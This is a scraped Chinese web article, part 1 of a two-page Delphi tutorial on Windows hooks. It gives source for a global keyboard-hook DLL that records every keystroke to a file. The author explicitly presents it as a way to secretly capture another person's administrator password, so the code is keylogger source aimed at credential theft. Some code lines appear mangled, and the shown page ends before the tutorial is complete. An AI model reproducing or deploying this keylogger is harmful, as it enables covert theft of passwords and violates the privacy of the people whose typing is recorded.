首页 > > 程序设计 > delphi >

Delphi编程使用HOOK监视Windows (1)

2008-02-23 07:13:46来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

1 2 下一页

每个程序都有自己的生存空间,在Windows系统中你可以在任何时候让你的程序执行一些操作,还可以触发消息,触发的消息分为三种,一是操作你程序的界面,onClick,onMouseMove等等,另外一个可以使用Windows的消息机制来捕获一些系统消息,但是如果你想在任何时候监控任何程序的情况那可能你就会选择HOOK来实现了,虽然还有其他方法,但不得不承认,HOOK是一个比较简单解决问题的途径。

  下面就来举个例子(使用Delphi7.0调试通过):

  如果你需要访问某个人的机器,那在运行\\SB之后那个人就会在你机器上敲入他的adminsitrator密码,当然,你也可以使用黑客工具来得到他的密码,但是,为什么不自己尝试一下写个程序记录所有的键盘操作呢?

  首先需要申明一点,Hook不同于一般的应用程序,需要作为一个全局DLL出现,否则无法在你程序不激活的状态捕获其他信息的,(当然你可以用Windows消息,这个问题不在这里讨论)。

  写个DLL定义一下函数

function setkeyhook:bool;export;
function endkeyhook:bool;export;
procedure keyhookexit;far;
procedure SetMainHandle(Handle: HWND); export;forward;
function keyboardhookhandler(icode:integer;wparam:wparam;lparam:lparam):lresult;stdcall;export;

procedure EntryPointProc(Reason: Integer);
 const
  hMapObject: THandle = 0;
 begin
  case reason of
   DLL_PROCESS_ATTACH:
  begin
   hMapObject := CreateFileMapping($FFFFFFFF, nil, PAGE_READWRITE, 0, SizeOf(THookRec), ’_CBT’);
   rHookRec := MapViewOfFile(hMapObject, FILE_MAP_WRITE, 0, 0, 0);
  end;
  DLL_PROCESS_DETACH:
 begin
 try
  UnMapViewOfFile(rHookRec);
  CloseHandle(hMapObject);
  except
 end;
end;
end;
end;
procedure keyhookexit;far;
begin
if hNexthookproc<>0 then endkeyhook;
 exitproc:=procsaveexit;
end;
function endkeyhook:bool;export;
begin
if hNexthookproc<>0 then
begin
 unhookwindowshookex(hNexthookproc);
 hNexthookproc:=0;
 messagebeep(0);
end;
result:=hNexthookproc=0;
MainHandle:=0;
end;

function Setkeyhook:bool;export;
begin
 hNexthookproc:=SetWindowsHookEx(WH_KEYBOARD ,keyboardhookhandler,HInstance,0);
 result:=hNexthookproc<>0;
end;
function keyboardhookhandler(icode:integer;wparam:wparam;lparam:lparam):lresult;stdcall;export;
var
 s:Tstringlist;
begin
 if icode<0 then
 begin
  result:=CallNextHookEX(hNexthookproc,icode,wparam,lparam);
  exit;
 end;
 if lparam<0 then
 begin
  exit;
 end;
 s:=TStringlist.Create;
 if FileExists(afilename) then
  s.LoadFromFile(afilename);

  //将敲打的键盘字符保存到文件中
  s.Add(formatdatetime(’YYYYMMDD hh:nn:ss:zzz: ’,now) char(wParam) );
  s.SaveToFile(afilename);
  s.Free;

  result:=0;
 end;

上一篇: 如何用Delphi语言制作中国式的报表 (1)
下一篇: DELPHI面向对象特点 保护级类成员应用

1 2 下一页

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:Delphi2005和DUnit搭建敏捷开发平台 (1)

下一篇:推荐编程技巧:Delphi语言数据集过滤 (1)

相关文章

IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设

网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源

网站联盟: 联盟新闻 联盟介绍 联盟点评 网赚技巧

行业资讯: 搜索引擎 网络游戏 电子商务 广告传媒

网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它

服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护

软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷

网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash

程序设计: Java技术 C/C++ VB delphi

网络知识: 网络协议 网络安全 网络管理 组网方案 Cisco技术

操作系统: Win2000 WinXP Win2003 Mac OS Linux FreeBSD

热门词条
最新资讯
热门关注
热门标签